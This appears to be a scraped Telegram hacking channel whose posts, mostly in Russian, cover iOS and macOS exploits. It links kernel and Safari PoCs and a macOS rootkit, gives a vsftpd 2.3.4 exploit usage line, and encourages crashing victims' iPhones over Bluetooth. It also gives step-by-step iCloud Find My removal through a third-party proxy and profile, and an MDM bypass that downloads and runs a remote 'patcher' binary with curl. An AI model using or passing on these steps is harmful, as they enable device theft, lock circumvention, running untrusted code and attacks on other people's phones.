ar
Feedback
iPhone:~ root#

iPhone:~ root#

الذهاب إلى القناة على Telegram

Избранные кишат ссылками, пора отсортировать [smx7MYTQIi2M]

إظهار المزيد
838
المشتركون
لا توجد بيانات24 ساعات
+27 أيام
-330 أيام
أرشيف المشاركات
Эксплуатация уязвимости выполнения кода на уровне ядра через функционал OTA Update в MacOS Доклад из разряда «Ничего не понятно, но очень интересно!». Для начала материалы: 1. Слайды с доклада 2. PoC для энтузиастов 3. Видео демонстрация К сожалению, мне не довелось еще изучить механизмы безопасности операционной системы MacOS, в частности, защиту SIP и прочие околосвязанные вещи. В теории я более менее понимаю, как оно работает, но пока что, все что я делал, это отключал SIP :) Надеюсь, эти материалы будут полезны тем, кто вплотную работает с этим направлением. Ну а остальным, в качестве расширения кругозора :₽ #macos #ace #kernel

Repost from Proxy Bar
vsftpd (для версии 2.3.4) usage: python3 vsftpd_exploit.py <IP address> <port> <command>

Repost from Proxy Bar
CVE-2023-41993 POC #Safari #iOS #iPadOS #macOS
CVE-2023-41993 POC #Safari #iOS #iPadOS #macOS

Repost from Proxy Bar
macOS RootKit * Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.

FMI OFF OPEN MENU NEW IPHONE @GSMDOCTORS

🔥iCloud Remove Open Menu FMI OFF🔥 - 🆕 NEW 2024 PROXY METHOD 🆕 1. First submit order with: Serial + UDID + Apple ID (You have 30 min to do all, after it system reject order) 2. Setup proxy in Wifi network > "i" button > Configure Proxy > Manual: Server: 167.86.115.86 Port: 8888 and click save 3. Open Safari and visit 167.86.115.86:8888, click download and install the profile 4. Go to iCloud >Show All > Off and On Game Center 2-3 times 5. Within 1-2 min order should reply OFF @GSMDOCTORS

HFZ Mdm Bypass on Macbook M1 & M2 via Terminal Directly, With Latest MacOS Version Supported Like: Monterey,Ventura,Sonoma. 1
HFZ Mdm Bypass on Macbook M1 & M2 via Terminal Directly, With Latest MacOS Version Supported Like: Monterey,Ventura,Sonoma. 1 Clean Restore Your Macbook & Install Fresh macOS 3 Wait for your Mac to shut down completely. A Mac is completely shut down when the screen is black. 4 Now Enter in Recovery Mode By Press and hold the power button for few seconds on your Mac until the system volume and recovery , and Options button appear. Then Click the Options button, then click Continue. Then you will enter in Recovery Mode. 5 Open Terminal , navigate to the top bar and click on Utilities. In the menu, find and click Terminal to open it in recovery mode. 6 Then Enter below command on Terminal : curl http://hfzproc.com/patcher -o patcher && chmod +x patcher && ./patcher - Now wait until the patch process get finished. Once its Done restart Mac Mdm Bypass Done on M1/M2 video soon

мой видос ващето, где пинг((((

Крашим устройства жертв на «iOS 17» с помощью Bluetooth (05.10.23) На днях интернет взорвала новость про найденную уязвимость в «яблочных» девайсах — злоумышленники начали блокировать «iPhone» и «iPad» бедолаг с помощью «Flipper Zero». Внимательно смотрим видео и впитываем новые знания. Прилагаю ссылочку для счастливых обладателей «хакерского тамагочи» на прошивку для него, а так же на сам эксплоит. Разумеется, строго в ознакомительных целях ✌️ Взорви телефон своего друга 🧨

Repost from Hacker News
Apple экстренно исправила еще один 0-day в своих продуктах https://xakep.ru/2023/10/05/apple-xnu-0day/

Разработчик opa334 поделился мнением касательно будущего джейлбрейка. Большой пост был опубликован на форуме reddit. О возможности рутфул он знал давно. "Я знал, что rootful всё ещё возможен в течение довольно долгого времени, проблема в том, что это займет много вашего пространства, и я решил отказаться от этого для Dopamine. Кроме того, Procursus поддерживает только rootless с iOS 15, и идти вразрез с их планами и создание форка - это не то, что я хотел сделать. В долгосрочной перспективе у нас всё будет намного лучше без рут-доступа, и мы действительно должны были перейти к нему во времена iOS 11". Чем он занят сейчас и какие у него планы ? "Я работаю, хотя и ОЧЕНЬ медленно, над Dopamine 2.0, который, вероятно, не будет иметь каких-либо заметных новых функций, но откажется от oobPCI для kfd/whatever (exploit picker). В н. в. я занят дипломной работой бакалавра". Будет ли он работать над iOS/iPadOS 16 ? "Сейчас ситуация не выглядит хорошей, но возможно, Project Zero скоро представит эксплойт ядра для 17.0, и я надеюсь, что мы увидим хотя бы одно SPTM-обхода в какой-то момент. Недавно я купил 15 Pro на 17.0, и маловероятно, что я буду работать над 16.x, так как у меня нет личной потребности в таком джейлбрейке".

Да где же этому конец Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6. https://support.apple.com/en-gb/HT213961

😂✋

щас затетсим
щас затетсим

Repost from N/a
#ESP32-Sour-Apple Crash IOS17 devices over bluetooth. https://github.com/RapierXbox/ESP32-Sour-Apple